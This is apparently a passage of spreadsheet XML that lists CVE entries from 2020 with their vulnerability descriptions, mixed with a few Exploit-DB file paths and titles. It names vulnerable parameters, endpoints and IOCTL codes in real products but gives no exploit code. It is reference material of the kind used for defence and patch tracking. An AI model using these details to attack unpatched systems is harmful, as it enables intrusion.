    <t>Vulnerability in the Oracle Application Express Packaged Apps component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Packaged Apps. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Packaged Apps, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Packaged Apps accessible data as well as unauthorized read access to a subset of Oracle Application Express Packaged Apps accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14899</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Application Express Data Reporter component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Data Reporter. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Data Reporter, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Data Reporter accessible data as well as unauthorized read access to a subset of Oracle Application Express Data Reporter accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1490</t>
  </si>
  <si>
    <t>CVE-2020-14900</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Application Express Group Calendar component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Group Calendar. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Group Calendar, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Group Calendar accessible data as well as unauthorized read access to a subset of Oracle Application Express Group Calendar accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14901</t>
  </si>
  <si>
    <t>Vulnerability in the RDBMS Security component of Oracle Database Server. The supported version that is affected is 19c. Easily exploitable vulnerability allows high privileged attacker having Analyze Any privilege with network access via Oracle Net to compromise RDBMS Security. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all RDBMS Security accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1491</t>
  </si>
  <si>
    <t>CVE-2020-1492</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1525, CVE-2020-1554.</t>
  </si>
  <si>
    <t>CVE-2020-14926</t>
  </si>
  <si>
    <t>CMS Made Simple 2.2.14 allows XSS via a Search Term to the admin/moduleinterface.php?mact=ModuleManager page.</t>
  </si>
  <si>
    <t>CVE-2020-14927</t>
  </si>
  <si>
    <t>Navigate CMS 2.9 allows XSS via the Alias or Real URL field of the "Web Sites &gt; Create &gt; Aliases &gt; Add" screen.</t>
  </si>
  <si>
    <t>CVE-2020-14928</t>
  </si>
  <si>
    <t>evolution-data-server (eds) through 3.36.3 has a STARTTLS buffering issue that affects SMTP and POP3. When a server sends a "begin TLS" response, eds reads additional data and evaluates it in a TLS context, aka "response injection."</t>
  </si>
  <si>
    <t>CVE-2020-14929</t>
  </si>
  <si>
    <t>Alpine before 2.23 silently proceeds to use an insecure connection after a /tls is sent in certain circumstances involving PREAUTH, which is a less secure behavior than the alternative of closing the connection and letting the user decide what they would like to do.</t>
  </si>
  <si>
    <t>CVE-2020-1493</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when attaching files to Outlook messages, aka 'Microsoft Outlook Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/linux/remote/48196.txt</t>
  </si>
  <si>
    <t>CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit)</t>
  </si>
  <si>
    <t>CVE-2020-14930</t>
  </si>
  <si>
    <t>An issue was discovered in BT CTROMS Terminal OS Port Portal CT-464. Account takeover can occur because the password-reset feature discloses the verification token. Upon a getverificationcode.jsp request, this token is transmitted not only to the registered phone number of the user account, but is also transmitted to the unauthenticated HTTP client.</t>
  </si>
  <si>
    <t>CVE-2020-14931</t>
  </si>
  <si>
    <t>A stack-based buffer overflow in DMitry (Deepmagic Information Gathering Tool) 1.3a might allow remote WHOIS servers to execute arbitrary code via a long line in a response that is mishandled by nic_format_buff.</t>
  </si>
  <si>
    <t>CVE-2020-14932</t>
  </si>
  <si>
    <t>compose.php in SquirrelMail 1.4.22 calls unserialize for the $mailtodata value, which originates from an HTTP GET request. This is related to mailto.php.</t>
  </si>
  <si>
    <t>CVE-2020-14933</t>
  </si>
  <si>
    <t>** DISPUTED ** compose.php in SquirrelMail 1.4.22 calls unserialize for the $attachments value, which originates from an HTTP POST request. NOTE: the vendor disputes this because these two conditions for PHP object injection are not satisfied: existence of a PHP magic method (such as __wakeup or __destruct), and any attack-relevant classes must be declared before unserialize is called (or must be autoloaded). .</t>
  </si>
  <si>
    <t>CVE-2020-14934</t>
  </si>
  <si>
    <t>Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP agent. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. If the number of variables in the request exceeds the allocated buffer, a memory write out of the buffer boundaries occurs. This write operation provides a possibility to overwrite other variables allocated in the .bss section by the application. Because the sender of the frame is in control of the content that will be written beyond the buffer limits, and there is no strict process memory separation, this issue may allow overwriting of sensitive memory areas of an IoT device.</t>
  </si>
  <si>
    <t>CVE-2020-14935</t>
  </si>
  <si>
    <t>Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP bulk get request response encoding function. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. When a bulk get request response is assembled, a stack buffer dedicated for OIDs (with a limited capacity) is allocated in snmp_engine_get_bulk(). When snmp_engine_get_bulk() is populating the stack buffer, an overflow condition may occur due to lack of input length validation. This makes it possible to overwrite stack regions beyond the allocated buffer, including the return address from the function. As a result, the code execution path may be redirected to an address provided in the SNMP bulk get payload. If the target architecture uses common addressing space for program and data memory, it may also be possible to supply code in the SNMP request payload, and redirect the execution path to the remotely injected code, by modifying the function's return address.</t>
  </si>
  <si>
    <t>CVE-2020-14936</t>
  </si>
  <si>
    <t>Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP agent. Functions parsing the OIDs in SNMP requests lack sufficient allocated target-buffer capacity verification when writing parsed OID values. The function snmp_oid_decode_oid() may overwrite memory areas beyond the provided target buffer, when called from snmp_message_decode() upon an SNMP request reception. Because the content of the write operations is externally provided in the SNMP requests, it enables a remote overwrite of an IoT device's memory regions beyond the allocated buffer. This overflow may allow remote overwrite of stack and statically allocated variables memory regions by sending a crafted SNMP request.</t>
  </si>
  <si>
    <t>CVE-2020-14937</t>
  </si>
  <si>
    <t>Memory access out of buffer boundaries issues was discovered in Contiki-NG 4.4 through 4.5, in the SNMP BER encoder/decoder. The length of provided input/output buffers is insufficiently verified during the encoding and decoding of data. This may lead to out-of-bounds buffer read or write access in BER decoding and encoding functions.</t>
  </si>
  <si>
    <t>CVE-2020-14938</t>
  </si>
  <si>
    <t>An issue was discovered in map.c in FreedroidRPG 1.0rc2. It assumes lengths of data sets read from saved game files. It copies data from a file into a fixed-size heap-allocated buffer without size verification, leading to a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-14939</t>
  </si>
  <si>
    <t>An issue was discovered in savestruct_internal.c in FreedroidRPG 1.0rc2. Saved game files are composed of Lua scripts that recover a game's state. A file can be modified to put any Lua code inside, leading to arbitrary code execution while loading.</t>
  </si>
  <si>
    <t>CVE-2020-1494</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1495, CVE-2020-1496, CVE-2020-1498, CVE-2020-1504.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48634.txt</t>
  </si>
  <si>
    <t>OCS Inventory NG 2.7 - Remote Code Execution</t>
  </si>
  <si>
    <t>2020-07-02</t>
  </si>
  <si>
    <t>CVE-2020-14940</t>
  </si>
  <si>
    <t>An issue was discovered in io/gpx/GPXDocumentReader.java in TuxGuitar 1.5.4. It uses misconfigured XML parsers, leading to XXE while loading GP6 (.gpx) and GP7 (.gp) tablature files.</t>
  </si>
  <si>
    <t>CVE-2020-14942</t>
  </si>
  <si>
    <t>Tendenci 12.0.10 allows unrestricted deserialization in apps\helpdesk\views\staff.py.</t>
  </si>
  <si>
    <t>CVE-2020-14943</t>
  </si>
  <si>
    <t>The Firstname and Lastname parameters in Global RADAR BSA Radar 1.6.7234.24750 and earlier are vulnerable to stored cross-site scripting (XSS) via Update User Profile.</t>
  </si>
  <si>
    <t>CVE-2020-14944</t>
  </si>
  <si>
    <t>Global RADAR BSA Radar 1.6.7234.24750 and earlier lacks valid authorization controls in multiple functions. This can allow for manipulation and takeover of user accounts if successfully exploited. The following vulnerable functions are exposed: ChangePassword, SaveUserProfile, and GetUser.</t>
  </si>
  <si>
    <t>CVE-2020-14945</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability exists within Global RADAR BSA Radar 1.6.7234.24750 and earlier that allows an authenticated, low-privileged user to escalate their privileges to administrator rights (i.e., the BankAdmin role) via modified SaveUser data.</t>
  </si>
  <si>
    <t>CVE-2020-14946</t>
  </si>
  <si>
    <t>downloadFile.ashx in the Administrator section of the Surveillance module in Global RADAR BSA Radar 1.6.7234.24750 and earlier allows users to download transaction files. When downloading the files, a user is able to view local files on the web server by manipulating the FileName and FilePath parameters in the URL, or while using a proxy. This vulnerability could be used to view local sensitive files or configuration files.</t>
  </si>
  <si>
    <t>CVE-2020-14947</t>
  </si>
  <si>
    <t>OCS Inventory NG 2.7 allows Remote Command Execution via shell metacharacters to require/commandLine/CommandLine.php because mib_file in plugins/main_sections/ms_config/ms_snmp_config.php is mishandled in get_mib_oid.</t>
  </si>
  <si>
    <t>CVE-2020-1495</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1494, CVE-2020-1496, CVE-2020-1498, CVE-2020-1504.</t>
  </si>
  <si>
    <t>CVE-2020-14950</t>
  </si>
  <si>
    <t>aaPanel through 6.6.6 allows remote authenticated users to execute arbitrary commands via shell metacharacters in a modified /system?action=ServiceAdmin request (start, stop, or restart) to the setting menu of Sotfware Store.</t>
  </si>
  <si>
    <t>CVE-2020-14954</t>
  </si>
  <si>
    <t>Mutt before 1.14.4 and NeoMutt before 2020-06-19 have a STARTTLS buffering issue that affects IMAP, SMTP, and POP3. When a server sends a "begin TLS" response, the client reads additional data (e.g., from a man-in-the-middle attacker) and evaluates it in a TLS context, aka "response injection."</t>
  </si>
  <si>
    <t>CVE-2020-14955</t>
  </si>
  <si>
    <t>In Jiangmin Antivirus 16.0.13.129, the driver file (KVFG.sys) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x220440.</t>
  </si>
  <si>
    <t>CVE-2020-14956</t>
  </si>
  <si>
    <t>In Windows cleaning assistant 3.2, the driver file (AtpKrnl.sys) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x223CCA.</t>
  </si>
  <si>
    <t>CVE-2020-14957</t>
  </si>
  <si>
    <t>In Windows cleaning assistant 3.2, the driver file (AtpKrnl.sys) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x223CCD.</t>
  </si>
  <si>
    <t>CVE-2020-14958</t>
  </si>
  <si>
    <t>In Gogs 0.11.91, MakeEmailPrimary in models/user_mail.go lacks a "not the owner of the email" check.</t>
  </si>
  <si>
    <t>CVE-2020-14959</t>
  </si>
  <si>
    <t>Multiple XSS vulnerabilities in the Easy Testimonials plugin before 3.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the wp-admin/post.php Client Name, Position, Web Address, Other, Location Reviewed, Product Reviewed, Item Reviewed, or Rating parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1496</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1494, CVE-2020-1495, CVE-2020-1498, CVE-2020-1504.</t>
  </si>
  <si>
    <t>CVE-2020-14960</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in PHP-Fusion 9.03.50 affects the endpoint administration/comments.php via the ctype parameter,</t>
  </si>
  <si>
    <t>CVE-2020-14961</t>
  </si>
  <si>
    <t>Concrete5 before 8.5.3 does not constrain the sort direction to a valid asc or desc value.</t>
  </si>
  <si>
    <t>CVE-2020-14962</t>
  </si>
  <si>
    <t>Multiple XSS vulnerabilities in the Final Tiles Gallery plugin before 3.4.19 for WordPress allow remote attackers to inject arbitrary web script or HTML via the Title (aka imageTitle) or Caption (aka description) field of an image to wp-admin/admin-ajax.php.</t>
  </si>
  <si>
    <t>CVE-2020-14965</t>
  </si>
  <si>
    <t>On TP-Link TL-WR740N v4 and TL-WR740ND v4 devices, an attacker with access to the admin panel can inject HTML code and change the HTML context of the target pages and stations in the access-control settings via targets_lists_name or hosts_lists_name. The vulnerability can also be exploited through a CSRF, requiring no authentication as an administrator.</t>
  </si>
  <si>
    <t>CVE-2020-14966</t>
  </si>
  <si>
    <t>An issue was discovered in the jsrsasign package through 8.0.18 for Node.js. It allows a malleability in ECDSA signatures by not checking overflows in the length of a sequence and '0' characters appended or prepended to an integer. The modified signatures are verified as valid. This could have a security-relevant impact if an application relied on a single canonical signature.</t>
  </si>
  <si>
    <t>CVE-2020-14967</t>
  </si>
  <si>
    <t>An issue was discovered in the jsrsasign package before 8.0.18 for Node.js. Its RSA PKCS1 v1.5 decryption implementation does not detect ciphertext modification by prepending '\0' bytes to ciphertexts (it decrypts modified ciphertexts without error). An attacker might prepend these bytes with the goal of triggering memory corruption issues.</t>
  </si>
  <si>
    <t>CVE-2020-14968</t>
  </si>
  <si>
    <t>An issue was discovered in the jsrsasign package before 8.0.17 for Node.js. Its RSASSA-PSS (RSA-PSS) implementation does not detect signature manipulation/modification by prepending '\0' bytes to a signature (it accepts these modified signatures as valid). An attacker can abuse this behavior in an application by creating multiple valid signatures where only one signature should exist. Also, an attacker might prepend these bytes with the goal of triggering memory corruption issues.</t>
  </si>
  <si>
    <t>CVE-2020-14969</t>
  </si>
  <si>
    <t>app/Model/Attribute.php in MISP 2.4.127 lacks an ACL lookup on attribute correlations. This occurs when querying the attribute restsearch API, revealing metadata about a correlating but unreachable attribute.</t>
  </si>
  <si>
    <t>CVE-2020-1497</t>
  </si>
  <si>
    <t>CVE-2020-14971</t>
  </si>
  <si>
    <t>Pi-hole through 5.0 allows code injection in piholedhcp (the Static DHCP Leases section) by modifying Teleporter backup files and then restoring them. This occurs in settings.php. To exploit this, an attacker would request a backup of limited files via teleporter.php. These are placed into a .tar.gz archive. The attacker then modifies the host parameter in dnsmasq.d files, and then compresses and uploads these files again.</t>
  </si>
  <si>
    <t>CVE-2020-14972</t>
  </si>
  <si>
    <t>Multiple SQL injection vulnerabilities in Sourcecodester Pisay Online E-Learning System 1.0 allow remote unauthenticated attackers to bypass authentication and achieve Remote Code Execution (RCE) via the user_email, user_pass, and id parameters on the admin login-portal and the edit-lessons webpages.</t>
  </si>
  <si>
    <t>CVE-2020-14973</t>
  </si>
  <si>
    <t>The loginForm within the general/login.php webpage in webTareas 2.0p8 suffers from a Reflected Cross Site Scripting (XSS) vulnerability via the query string.</t>
  </si>
  <si>
    <t>CVE-2020-14974</t>
  </si>
  <si>
    <t>The driver in IOBit Unlocker 1.1.2 allows a low-privileged user to unlock a file and kill processes (even ones running as SYSTEM) that hold a handle, via IOCTL code 0x222124.</t>
  </si>
  <si>
    <t>CVE-2020-14975</t>
  </si>
  <si>
    <t>The driver in IOBit Unlocker 1.1.2 allows a low-privileged user to delete, move, or copy arbitrary files via IOCTL code 0x222124.</t>
  </si>
  <si>
    <t>CVE-2020-14976</t>
  </si>
  <si>
    <t>GNS3 ubridge through 0.9.18 on macOS, as used in GNS3 server before 2.1.17, allows a local attacker to read arbitrary files because it handles configuration-file errors by printing the configuration file while executing in a setuid root context.</t>
  </si>
  <si>
    <t>CVE-2020-14977</t>
  </si>
  <si>
    <t>An issue was discovered in F-Secure SAFE 17.7 on macOS. The XPC services use the PID to identify the connecting client, which allows an attacker to perform a PID reuse attack and connect to a privileged XPC service, and execute privileged commands on the system. NOTE: the attacker needs to execute code on an already compromised machine.</t>
  </si>
  <si>
    <t>CVE-2020-14978</t>
  </si>
  <si>
    <t>An issue was discovered in F-Secure SAFE 17.7 on macOS. Due to incorrect client version verification, an attacker can connect to a privileged XPC service, and execute privileged commands on the system. NOTE: the attacker needs to execute code on an already compromised machine.</t>
  </si>
  <si>
    <t>CVE-2020-14979</t>
  </si>
  <si>
    <t>The WinRing0.sys and WinRing0x64.sys drivers 1.2.0 in EVGA Precision X1 through 1.0.6 allow local users, including low integrity processes, to read and write to arbitrary memory locations. This allows any user to gain NT AUTHORITY\SYSTEM privileges by mapping \Device\PhysicalMemory into the calling process.</t>
  </si>
  <si>
    <t>CVE-2020-1498</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1494, CVE-2020-1495, CVE-2020-1496, CVE-2020-1504.</t>
  </si>
  <si>
    <t>CVE-2020-14980</t>
  </si>
  <si>
    <t>The Sophos Secure Email application through 3.9.4 for Android has Missing SSL Certificate Validation.</t>
  </si>
  <si>
    <t>CVE-2020-14981</t>
  </si>
  <si>
    <t>The ThreatTrack VIPRE Password Vault app through 1.100.1090 for iOS has Missing SSL Certificate Validation.</t>
  </si>
  <si>
    <t>CVE-2020-14982</t>
  </si>
  <si>
    <t>A Blind SQL Injection vulnerability in Kronos WebTA 3.8.x and later before 4.0 (affecting the com.threeis.webta.H352premPayRequest servlet's SortBy parameter) allows an attacker with the Employee, Supervisor, or Timekeeper role to read sensitive data from the database.</t>
  </si>
  <si>
    <t>CVE-2020-14983</t>
  </si>
  <si>
    <t>The server in Chocolate Doom 3.0.0 and Crispy Doom 5.8.0 doesn't validate the user-controlled num_players value, leading to a buffer overflow. A malicious user can overwrite the server's stack.</t>
  </si>
  <si>
    <t>CVE-2020-14987</t>
  </si>
  <si>
    <t>An issue was discovered in Bloomreach Experience Manager (brXM) 4.1.0 through 14.2.2. It allows remote attackers to execute arbitrary code because there is a mishandling of the capability for administrators to write and run Groovy scripts within the updater editor. An attacker must use an AST transforming annotation such as @Grab.</t>
  </si>
  <si>
    <t>CVE-2020-14988</t>
  </si>
  <si>
    <t>An issue was discovered in Bloomreach Experience Manager (brXM) 4.1.0 through 14.2.2. It allows XSS in the login page via the loginmessage parameter, the text editor via the src attribute of HTML elements, the translations menu via the foldername parameter, the author page via the link URL, or the upload image functionality via an SVG document containing JavaScript.</t>
  </si>
  <si>
    <t>CVE-2020-14989</t>
  </si>
  <si>
    <t>An issue was discovered in Bloomreach Experience Manager (brXM) 4.1.0 through 14.2.2. It allows CSRF if the attacker uses GET where POST was intended.</t>
  </si>
  <si>
    <t>CVE-2020-1499</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1500, CVE-2020-1501.</t>
  </si>
  <si>
    <t>CVE-2020-14990</t>
  </si>
  <si>
    <t>IOBit Advanced SystemCare Free 13.5.0.263 allows local users to gain privileges for file deletion by manipulating the Clean &amp; Optimize feature with an NTFS junction and an Object Manager symbolic link.</t>
  </si>
  <si>
    <t>CVE-2020-14993</t>
  </si>
  <si>
    <t>A stack-based buffer overflow on DrayTek Vigor2960, Vigor3900, and Vigor300B devices before 1.5.1.1 allows remote attackers to execute arbitrary code via the formuserphonenumber parameter in an authusersms action to mainfunction.cgi.</t>
  </si>
  <si>
    <t>CVE-2020-14999</t>
  </si>
  <si>
    <t>A logic bug in system monitoring driver of Acronis Agent after 12.5.21540 and before 12.5.23094 allowed to bypass Windows memory protection and access sensitive data.</t>
  </si>
  <si>
    <t>CVE-2020-1500</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1499, CVE-2020-1501.</t>
  </si>
  <si>
    <t>CVE-2020-15000</t>
  </si>
  <si>
    <t>A PIN management problem was discovered on Yubico YubiKey 5 devices 5.2.0 to 5.2.6. OpenPGP has three passwords: Admin PIN, Reset Code, and User PIN. The Reset Code is used to reset the User PIN, but it is disabled by default. A flaw in the implementation of OpenPGP sets the Reset Code to a known value upon initialization. If the retry counter for the Reset Code is set to non-zero without changing the Reset Code, this known value can be used to reset the User PIN. To set the retry counters, the Admin PIN is required.</t>
  </si>
  <si>
    <t>CVE-2020-15001</t>
  </si>
  <si>
    <t>An information leak was discovered on Yubico YubiKey 5 NFC devices 5.0.0 to 5.2.6 and 5.3.0 to 5.3.1. The OTP application allows a user to set optional access codes on OTP slots. This access code is intended to prevent unauthorized changes to OTP configurations. The access code is not checked when updating NFC specific components of the OTP configurations. This may allow an attacker to access configured OTPs and passwords stored in slots that were not configured by the user to be read over NFC, despite a user having set an access code. (Users who have not set an access code, or who have not configured the OTP slots, are not impacted by this issue.)</t>
  </si>
  <si>
    <t>CVE-2020-15002</t>
  </si>
  <si>
    <t>OX App Suite through 7.10.3 allows SSRF via the the /ajax/messaging/message message API.</t>
  </si>
  <si>
    <t>CVE-2020-15003</t>
  </si>
  <si>
    <t>OX App Suite through 7.10.3 allows Information Exposure because a user can obtain the IP address and User-Agent string of a different user (via the session API during shared Drive access).</t>
  </si>
  <si>
    <t>CVE-2020-15004</t>
  </si>
  <si>
    <t>OX App Suite through 7.10.3 allows stats/diagnostic?param= XSS.</t>
  </si>
  <si>
    <t>CVE-2020-15005</t>
  </si>
  <si>
    <t>In MediaWiki before 1.31.8, 1.32.x and 1.33.x before 1.33.4, and 1.34.x before 1.34.2, private wikis behind a caching server using the img_auth.php image authorization security feature may have had their files cached publicly, so any unauthorized user could view them. This occurs because Cache-Control and Vary headers were mishandled.</t>
  </si>
  <si>
    <t>CVE-2020-15006</t>
  </si>
  <si>
    <t>Bludit 3.12.0 allows stored XSS via JavaScript code in an SVG document to bl-kernel/ajax/logo-upload.php.</t>
  </si>
  <si>
    <t>CVE-2020-15007</t>
  </si>
  <si>
    <t>A buffer overflow in the M_LoadDefaults function in m_misc.c in id Tech 1 (aka Doom engine) allows arbitrary code execution via an unsafe usage of fscanf, because it does not limit the number of characters to be read in a format argument.</t>
  </si>
  <si>
    <t>CVE-2020-15008</t>
  </si>
  <si>
    <t>A SQLi exists in the probe code of all Connectwise Automate versions before 2020.7 or 2019.12. A SQL Injection in the probe implementation to save data to a custom table exists due to inadequate server side validation. As the code creates dynamic SQL for the insert statement and utilizes the user supplied table name with little validation, the table name can be modified to allow arbitrary update commands to be run. Usage of other SQL injection techniques such as timing attacks, it is possible to perform full data extraction as well. Patched in 2020.7 and in a hotfix for 2019.12.</t>
  </si>
  <si>
    <t>CVE-2020-15009</t>
  </si>
  <si>
    <t>AsusScreenXpertServicec.exe and ScreenXpertUpgradeServiceManager.exe in ScreenPad2_Upgrade_Tool.msi V1.0.3 for ASUS PCs with ScreenPad 1.0 (UX450FDX, UX550GDX and UX550GEX) could lead to unsigned code execution with no additional restrictions when a user puts an application at a particular path with a particular file name.</t>
  </si>
  <si>
    <t>CVE-2020-1501</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1499, CVE-2020-1500.</t>
  </si>
  <si>
    <t>CVE-2020-15011</t>
  </si>
  <si>
    <t>GNU Mailman before 2.1.33 allows arbitrary content injection via the Cgi/private.py private archive login page.</t>
  </si>
  <si>
    <t>CVE-2020-15012</t>
  </si>
  <si>
    <t>A Directory Traversal issue was discovered in Sonatype Nexus Repository Manager 2.x before 2.14.19. A user that requests a crafted path can traverse up the file system to get access to content on disk (that the user running nxrm also has access to).</t>
  </si>
  <si>
    <t>CVE-2020-15014</t>
  </si>
  <si>
    <t>pramodmahato BlogCMS through 2019-12-31 has admin/changepass.php CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-15015</t>
  </si>
  <si>
    <t>The FileExplorer component in GleamTech FileUltimate 6.1.5.0 allows XSS via an SVG document.</t>
  </si>
  <si>
    <t>CVE-2020-15016</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to reflected cross-site scripting. The Other-Converter.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the txt GET parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15017</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to reflected cross-site scripting. The Devices-Config.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the sta GET parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15018</t>
  </si>
  <si>
    <t>playSMS through 1.4.3 is vulnerable to session fixation.</t>
  </si>
  <si>
    <t>CVE-2020-1502</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft Word improperly discloses the contents of its memory, aka 'Microsoft Word Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1503, CVE-2020-1583.</t>
  </si>
  <si>
    <t>CVE-2020-15020</t>
  </si>
  <si>
    <t>An issue was discovered in the Elementor plugin through 2.9.13 for WordPress. An authenticated attacker can achieve stored XSS via the Name Your Template field.</t>
  </si>
  <si>
    <t>CVE-2020-15023</t>
  </si>
  <si>
    <t>Askey AP5100W devices through AP5100W_Dual_SIG_1.01.097 are affected by WPS PIN offline brute-force cracking. This arises because of issues with the random number selection for the Diffie-Hellman exchange. By capturing an attempted (and even failed) WPS authentication attempt, it is possible to brute force the overall authentication exchange. This allows an attacker to obtain the recovered WPS PIN in minutes or even seconds, and eventually obtain the Wi-Fi PSK key, gaining access to the Wi=Fi network.</t>
  </si>
  <si>
    <t>CVE-2020-15024</t>
  </si>
  <si>
    <t>An issue was discovered in the Login Password feature of the Password Manager component in Avast Antivirus 20.1.5069.562. An entered password continues to be stored in Windows main memory after a logout, and after a Lock Vault operation.</t>
  </si>
  <si>
    <t>CVE-2020-15025</t>
  </si>
  <si>
    <t>ntpd in ntp 4.2.8 before 4.2.8p15 and 4.3.x before 4.3.101 allows remote attackers to cause a denial of service (memory consumption) by sending packets, because memory is not freed in situations where a CMAC key is used and associated with a CMAC algorithm in the ntp.keys file.</t>
  </si>
  <si>
    <t>CVE-2020-15026</t>
  </si>
  <si>
    <t>Bludit 3.12.0 allows admins to use a /plugin-backup-download?file=../ directory traversal approach for arbitrary file download via backup/plugin.php.</t>
  </si>
  <si>
    <t>CVE-2020-15027</t>
  </si>
  <si>
    <t>ConnectWise Automate through 2020.x has insufficient validation on certain authentication paths, allowing authentication bypass via a series of attempts. This was patched in 2020.7 and in a hotfix for 2019.12.</t>
  </si>
  <si>
    <t>CVE-2020-15028</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack. The application allows an attacker to execute arbitrary JavaScript code via the Topology-Map.php xo parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15029</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to cross-site scripting (XSS) attack. The application allows an attacker to execute arbitrary JavaScript code via the Assets-Management.php sn parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1503</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft Word improperly discloses the contents of its memory, aka 'Microsoft Word Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1502, CVE-2020-1583.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48724.txt</t>
  </si>
  <si>
    <t>Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-15030</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to cross-site scripting (XSS) attack. The application allows an attacker to execute arbitrary JavaScript code via the Topology-Routes.php rtr parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15031</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to cross-site scripting (XSS) attack. The application allows an attacker to execute arbitrary JavaScript code via the Assets-Management.php chg parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15032</t>
  </si>
  <si>
